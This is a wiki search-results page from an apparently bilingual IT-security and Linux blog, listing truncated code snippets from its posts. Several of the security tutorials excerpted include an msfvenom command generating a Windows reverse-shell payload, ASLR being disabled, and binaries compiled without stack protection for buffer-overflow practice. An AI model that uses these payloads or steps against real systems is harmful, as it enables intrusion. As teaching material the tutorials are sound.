Suche
Unten sind die Ergebnisse Ihrer Suche gelistet.
Volltextergebnisse:
- Shellcode Injection Part 1 @en:it-security:blog
- | | > shell.c | Save to the file shell.c | <code bash> msfvenom -p windows/shell_reverse_tcp LHOST=172.... rst we create the shellcode in raw format: <code bash> msfvenom -p windows/shell_reverse_tcp LHOST=172.... ll working}}] \\ \\ ===== Repository ===== <code bash> git clone https://github.com/psycore8/nosoc-shel
- Buffer overflow in the 64-bit stack - Part 3 @en:it-security:blog
- docs.pwntools.com/en/stable/install.html)) <code bash> python3 -m pip install --upgrade pip python3 -m ... ion on Github in the Dependencies section. <code bash> /dir/to/socat TCP-LISTEN:2323,reuseaddr,fork EXE... e check where the path to the ''libc'' is: <code bash> ldd bof-part3 linux-vdso.so.1 (0x00007ff... find the offset for ''write()'' function: <code bash> readelf -s /lib/x86_64-linux-gnu/libc.so.6 | gre
- Buffer overflow in the 64-bit stack - part 1 @en:it-security:blog
- ithub.com/longld/peda/blob/master/README)) <code bash> git clone https://github.com/longld/peda.git ~/p... d so that memory areas are not randomised. <code bash> echo 0 | sudo tee /proc/sys/kernel/randomize_va_... return 0; } </code> \\ \\ === Compile === <code bash> gcc -fno-stack-protector -z execstack bof.c -o b... ugger and generate a 200-character string: <code bash> gdb -q vulnerable pattern_create 200 in.bin r <
- Buffer overflow in the 64-bit stack - Part 2 @en:it-security:blog
- |kompilierte debug binary]] from the blog. <code bash> br *vuln+73 # setze Breakpoint r < in.txt... verflow_x64|Part 1]], we also need ropper. <code bash> sudo apt install ropper </code> \\ \\ ===== Deac... as base address as in the examples above. <code bash> gcc -fno-stack-protector -no-pie bof-part2.c -o ... s, we start ropper and display the gadgets <code bash> ropper --file bof-part2 ... 0x000000000040116a:
- Privilege escalation: Windows admin thanks to Linux @en:it-security:blog
- ==== Now we can install ''chntpw'' using: <code bash> sudo apt install chntpw </code> \\ \\ ==== Find ... We are looking for the Windows partition. <code bash> sudo sfdisk -l </code> {{it-security:blog:scree... tion and create it in our $HOME directory. <code bash> mkdir ~/win </code> We then mount the partition. <code bash> sudo mount /dev/sda3 ~/win </code> Now we navig
- Wallabag installation under Debian @en:linux
- at this link]]. ===== Installation ===== <code bash> git clone https://github.com/wallabag/wallabag.g... lHost> </code> ===== Authorisations ===== <code bash> chown -R www-data:www-data /home/user/wallabag/v... = LetsEncrypt certificate as cronjob ===== <code bash> 30 3 * * 0 /opt/certbot/certbot-auto certonly --
- Backing up the sshd @en:linux
- Firstly, we create a key pair under Linux: <code bash> $ ssh-keygen -t rsa -b 4096 Generating public/pr... nstall wipe with //apt-get install wipe//) <code bash>$ wipe id_rsa Okay to WIPE 1 regular file ? (Yes/... hould have access to the sshd. Set modes: <code bash> chmod 0700 .ssh chmod 0600 .ssh/authorized_keys ... ation no </code> ===== Restart sshd ===== <code bash>/etc/init.d/ssh restart</code> ==== Hint ==== T
- Postfix Virtual Mailbox Limit @en:linux
- ter restarting Postfix, the problem should be solved: <code bash> $ /etc/init.d/postfix restart </code>
- Integration of Collabora Office in OwnCloud @en:linux
- ===== ===== Installation of Docker ===== <code bash> apt update # Notwendiges Repository hinzufügen ... Starting Docker with Collabora Image ===== <code bash> docker pull collabora/code docker run -t -d -p 1
- n8n installation with Docker Compose @en:linux
- ==== ==== 1.1 Uninstall old versions ==== <code bash> sudo apt-get remove docker docker-engine docker.... == 1.2.1 Update apt and activate HTTPS === <code bash> sudo apt-get update sudo apt-get install \ ... /code> === 1.2.2 Add Docker GPG Key === <code bash> sudo mkdir -m 0755 -p /etc/apt/keyrings curl -fs... cker.gpg </code> === 1.2.3 Repo setup === <code bash> echo \ "deb [arch=$(dpkg --print-architecture)
- n8n installation and operation @en:linux
- Docker Compose. ===== Download n8n ===== <code bash> docker pull n8nio/n8n </code> ===== Starting th... ker container ===== ==== Interactive ==== <code bash> docker run -it --rm --name n8n -p 1234:1234 -v ~... 8n n8nio/n8n </code> ==== Background ==== <code bash> docker run -t -d --rm --name n8n -p 1234:1234 \ ... .n8n n8nio/n8n </code> ===== Update ===== <code bash> docker pull n8nio/n8n docker ps -a docker stop [
- Kali Linuxc: apt error - File has unexpected size @en:linux
- tp]] should be changed to [[wpde>https]] : <code bash> echo "deb https://http.kali.org/kali kali-rollin
- Update UnrealIRCD @en:linux
- ion 6.1.0) ===== Importing GPG keys ===== <code bash> wget -O- https://raw.githubusercontent.com/unrea... d of x.x.x (e.g. unrealircd-6.1.0.tar.gz). <code bash> wget https://www.unrealircd.org/downloads/unreal... ar.gz </code> ===== Check integrity ===== <code bash> wget https://www.unrealircd.org/downloads/unreal... archive ===== Now we unpack the archive. <code bash> tar xfvz unrealx.x.x.tar.gz </code> ===== Stop
- Set up iptables @en:linux
- ommand lists all valid rules for iptables: <code bash> iptables -L </code> ===== Save rules to a file ===== <code bash> apt-get update apt-get install iptables-persiste... tivate rules in productive operation ===== <code bash> iptables-save > /etc/iptables.up.rules nano /etc... The following lines must be inserted here: <code bash> #!/bin/bash /sbin/iptables-restore < /etc/iptab
- Linux Commands Cheatsheet @en:linux
- ttp://yellowpad.info/linux/date_time.asp)) <code bash> [me@mybox me]$ su password: Check the current d... 4 </code> ===== Load Apache modules ===== <code bash> a2enmod modname </code> or activate it with <code bash> a2dismod modname </code> deaktivieren. The web server must then be restarted with <code bash> /etc/init.d/apache2 restart </code> nötig. ===